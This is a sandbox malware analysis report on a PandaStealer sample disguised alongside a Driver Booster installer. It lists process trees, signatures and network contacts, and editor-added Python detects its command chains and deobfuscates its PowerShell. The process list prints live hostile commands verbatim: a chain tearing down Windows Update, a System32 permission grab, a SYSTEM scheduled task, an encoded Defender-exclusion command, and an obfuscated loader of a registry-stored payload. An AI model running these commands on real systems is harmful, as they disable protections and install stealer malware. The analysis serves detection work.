Malware Analysis Report

2024-09-22 15:33

Sample ID 240414-v46wkaae52
Target 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
SHA256 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
Tags
pandastealer discovery evasion exploit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00

Threat Level: Known bad

The file 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00 was found to be: Known bad.

Malicious Activity Summary

pandastealer discovery evasion exploit spyware stealer

Panda Stealer payload

PandaStealer

Possible privilege escalation attempt

Stops running service(s)

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Modifies file permissions

Reads user/profile data of web browsers

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Modifies registry class

Modifies registry key

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-14 17:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 17:33

Reported

2024-04-14 17:47

Platform

win7-20240220-en

Max time kernel

3s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

Signatures

Panda Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

PandaStealer

stealer pandastealer

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Both hits come from the cmd.exe chain listed under Processes: takeown takes ownership of %SystemRoot%\System32\WaaSMedicSvc.dll and icacls then grants Everyone (S-1-1-0) full control so the DLL can be renamed to WaaSMedicSvc_BAK.dll. Together with the sc stop, reg delete and SCHTASKS /DISABLE commands in the same chain this is a Windows Update teardown, not an exploit. Note that WaaSMedicSvc (Windows Update Medic Service) only exists on Windows 10 and later, so on the win7 image used for this run the takeown, icacls and rename steps have nothing to act on.

Stops running service(s)

evasion

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A (5 launches: sc stop UsoSvc, WaaSMedicSvc, wuauserv, bits and dosvc; see Processes)

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 2880 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 1992 wrote to memory of 2624 (4 events) N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 2880 wrote to memory of 2512 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
PID 1992 wrote to memory of 2484 (4 events) N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 2484 wrote to memory of 1760 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"

C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp" /SL5="$40150,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "DBassistant"

C:\Windows\system32\taskeng.exe

taskeng.exe {2C733B94-B17B-4042-ADE0-505C7207B682} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
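The three cmd.exe chains above (the Windows Update teardown, the powercfg calls and the DBassistant task) are what a detection engineer would key on. Two details are worth pointing out before writing rules: the task target is under C:\Users\opera, not the sandbox's C:\Users\Admin profile, so the path appears to be hard-coded rather than derived at run time; and taskeng.exe then runs it as S-1-5-18 (NT AUTHORITY\SYSTEM), exactly as /ru "System" /rl highest requested, from a directory the user can write to. The following Python is an added example by the editor, not part of the sandbox report: it splits each &-chained command line into its sub-commands and tags each one with the behaviour it implements. The three malicious command lines are copied verbatim from the process list above, BENIGN is constructed for contrast, and the ATT&CK technique IDs in the labels are the editor's mapping (the report's own matrix is not reproduced in this extract).

```python
import re

# The three cmd.exe command lines below are copied verbatim from the behavioral1
# process list in this report; BENIGN is a constructed line for contrast.
UPDATE_KILL = (
    r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'
    r' & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)
POWERCFG = r'"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0'
PERSIST = r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""'
BENIGN = r'"C:\Windows\System32\cmd.exe" /c sc query wuauserv & schtasks /query /tn "\Microsoft\Windows\WindowsUpdate\Scheduled Start"'

# (label, pattern). Labels start with the editor's ATT&CK mapping; patterns are matched
# case-insensitively against one sub-command at a time. %SystemRoot% and C:\Windows both
# satisfy the System32 rules, so the same rules fit the child sc/reg/takeown/icacls lines.
RULES = [(label, re.compile(pat, re.I)) for label, pat in [
    ("T1489 Service Stop: Windows Update / BITS service stopped",
     r"^sc\s+(?:stop|delete)\s+(?:usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b"),
    ("T1112 Modify Registry: service definition deleted",
     r"^reg\s+delete\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\\S+\s+/f"),
    ("T1222.001 File Permissions Modification: takeown on a System32 file",
     r"^takeown\s+/f\s+\S*\\System32\\"),
    ("T1222.001 File Permissions Modification: icacls grants Everyone (S-1-1-0)",
     r"^icacls\s+\S*\\System32\\\S+\s+/grant\s+\*?S-1-1-0"),
    ("T1562.001 Impair Defenses: System32 file renamed",
     r"^rename\s+\S*\\System32\\"),
    ("T1562.001 Impair Defenses: Windows Update AU policy written",
     r"^reg\s+add\s+HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\b"),
    ("T1562.001 Impair Defenses: built-in Windows Update task disabled",
     r'^schtasks\s+/change\s+/tn\s+"\\Microsoft\\Windows\\(?:WindowsUpdate|UpdateOrchestrator)\\[^"]*"\s+/disable'),
    ("T1053.005 Scheduled Task: runs as SYSTEM from a user-writable path",
     r'^schtasks\s+/create\b(?=.*\s/ru\s+"?system"?)(?=.*\s/tr\s.*[A-Za-z]:\\Users\\[^"]*\\AppData\\)'),
    ("powercfg: sleep/hibernate timeouts set to 0 (host kept awake)",
     r"^powercfg\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b"),
]]


def split_chain(cmdline: str) -> list:
    """Strip the cmd.exe /c (or /k) wrapper and split an &-chained line into sub-commands."""
    body = re.sub(r'^"?[^"]*cmd\.exe"?\s+/[cCkK]\s+', "", cmdline)
    return [part.strip() for part in re.split(r"\s+&\s+", body) if part.strip()]


def classify(cmdline: str) -> list:
    """Return (label, sub-command) for every sub-command that matches a rule."""
    hits = []
    for cmd in split_chain(cmdline):
        for label, rx in RULES:
            if rx.search(cmd):
                hits.append((label, cmd))
                break  # first matching rule wins
    return hits


def techniques(cmdline: str) -> list:
    """Distinct leading tokens of the matched labels (the ATT&CK IDs), sorted."""
    return sorted({label.split(" ", 1)[0] for label, _ in classify(cmdline)})


def verdict(cmdline: str) -> str:
    """Three or more distinct behaviours in one command line is the update-teardown pattern."""
    n = len(techniques(cmdline))
    return "high" if n >= 3 else "medium" if n else "none"


if __name__ == "__main__":
    for name, line in (("UPDATE_KILL", UPDATE_KILL), ("POWERCFG", POWERCFG),
                       ("PERSIST", PERSIST), ("BENIGN", BENIGN)):
        print(f"{name}: {verdict(line)} {techniques(line)}")
        for label, cmd in classify(line):
            print(f"  [{label}] {cmd}")
```

Run as a script to see every sub-command of the three chains tagged; all 24 sub-commands of the update-teardown line match a rule, the powercfg line matches only the power-management rule, the DBassistant line matches only the SYSTEM-task rule, and the constructed query-only line matches nothing. Because the wrapper stripping is optional, the same `classify` call works on the individual child command lines (sc stop UsoSvc, reg delete ..., takeown /f C:\Windows\System32\WaaSMedicSvc.dll) that appear separately in the process list.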

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
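The two PowerShell invocations in this process list are obfuscated in different ways. The first (powershell.exe -EncodedCommand, launched by WCCNativeUpdate.exe) hides its script as base64 over the UTF-16LE script text, padded with `<# ... #>` block comments; decoded, it is `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, which excludes the whole user profile and the system drive from Microsoft Defender scanning. The second (powershell.EXE, run twice, once from System32 and once from SysWOW64 with identical text) builds every cmdlet, type and member name at run time with the -f format operator, string concatenation and backtick escapes that PowerShell treats as inert; resolved, it is `[Reflection.Assembly]::Load((Get-Item Variable:Dlr4S).Value::LocalMachine.OpenSubKey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($null,$null)`, so the next stage is a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager and is never written to disk as a standalone executable (compare the dialersvc32.job task file under Files). The following Python is an added worked example by the editor, not code from the report or the sample, that undoes both layers mechanically. The two inputs are the command lines copied verbatim from above; the CANONICAL table that restores readable casing at the end is the editor's cosmetic addition.

```python
import base64
import re

# Both inputs are copied verbatim from the behavioral1 process list in this report.
# FORMAT_OBFUSCATED is the argument inside the outer double quotes of the powershell.EXE
# line; the \" sequences are the sandbox's escaping of embedded quotes and are kept as-is.
ENCODED_COMMAND = "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
FORMAT_OBFUSCATED = r""".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"""


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> block comments (here pure junk padding) and collapse whitespace."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


# ("{1}{0}" -f 'eT','S')  -- a format string of bare {n} placeholders plus a list of literals
_FMT = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)""")
# ("6T"+"o")  -- plain concatenation of double-quoted literals
_CONCAT = re.compile(r'\(\s*"[^"]*"(?:\s*\+\s*"[^"]*")+\s*\)')

# Readable casing for the names that surface; purely cosmetic (editor's table).
CANONICAL = {
    "set": "Set", "get-item": "Get-Item", "reflection.assembly": "Reflection.Assembly",
    "microsoft.win32.registry": "Microsoft.Win32.Registry", "load": "Load",
    "value": "Value", "localmachine": "LocalMachine", "opensubkey": "OpenSubKey",
    "getvalue": "GetValue", "entrypoint": "EntryPoint", "invoke": "Invoke", "null": "null",
}


def _resolve_format(m: re.Match) -> str:
    fmt, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))
    return "('" + re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], fmt) + "')"


def _resolve_concat(m: re.Match) -> str:
    return "('" + "".join(re.findall(r'"([^"]*)"', m.group(0))) + "')"


def deobfuscate_format_operator(cmd: str) -> str:
    s = cmd.replace('\\"', '"')                                  # undo the sandbox's quoting
    s = _FMT.sub(_resolve_format, s)                             # ("{1}{0}" -f 'eT','S') -> ('SeT')
    s = _CONCAT.sub(_resolve_concat, s)                          # ("6T"+"o") -> ('6To')
    s = re.sub(r"`(?![0abefnrtuv])", "", s)                      # drop backticks that escape nothing
    s = re.sub(r'"(\w+)"', r"\1", s)                             # "VAluE" member names -> bare
    s = re.sub(r"\$\{(\w+)\}", r"$\1", s)                        # ${nUll} -> $nUll
    s = re.sub(r"(::|\.)\('([^']*)'\)\.Invoke\(", r"\1\2(", s)   # .('X').Invoke( -> .X(
    s = re.sub(r"\[\w+\]\('([^']*)'\)", r"[\1]", s)               # [tYpE]('name') -> [name]
    s = re.sub(r"\.\('([^']*)'\)", r"\1", s)                     # .('cmd') dot-call -> cmd
    s = re.sub(r"\(\(('[^']*')\)\)", r"(\1)", s)                 # f(('x')) -> f('x')
    s = re.sub(r"(?<=\s)\(\s*('[^']*'|\[[^\]]+\])\s*\)", r"\1", s)  # ( [x] ) -> [x]
    for key, canon in CANONICAL.items():
        s = re.sub(r"(?<![\w-])" + re.escape(key) + r"(?![\w-])", canon, s, flags=re.I)
    return s


if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED_COMMAND)))
    print(deobfuscate_format_operator(FORMAT_OBFUSCATED))
```

Run as a script to print both recovered commands. Everything up to the CANONICAL pass is a faithful transformation of the original text: format strings are expanded positionally, concatenations are joined, and only backticks that do not form a real PowerShell escape (the obfuscator never inserts `n, `t and the like, or the script would break) are removed, so a backtick that does matter is left alone.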

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3331cd96-be95-46f9-bd19-6cee6c77ea53}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{55144820-2c5f-4067-a015-a50dd418f139}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 f0854165.xsph.ru udp
RU 141.8.193.236:80 f0854165.xsph.ru tcp
US 8.8.8.8:53 update.iobit.com udp
US 152.199.20.140:80 update.iobit.com tcp (9 connections)

update.iobit.com is the update host of the bundled IObit Driver Booster installer (driver_booster_setup.exe, "Driver Booster 10" in the setup.exe command line); f0854165.xsph.ru is the only destination not tied to that installer.

Files

memory/1992-0-0x0000000000400000-0x00000000022FF000-memory.dmp

\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

MD5 ccc48304afa2e7c58492babc297db8a4
SHA1 decd98730cf34e1567965f6fb7085569fc1053e8
SHA256 e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910
SHA512 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

memory/2880-8-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

MD5 6a4308bc229b64cf5bc6d359056b8980
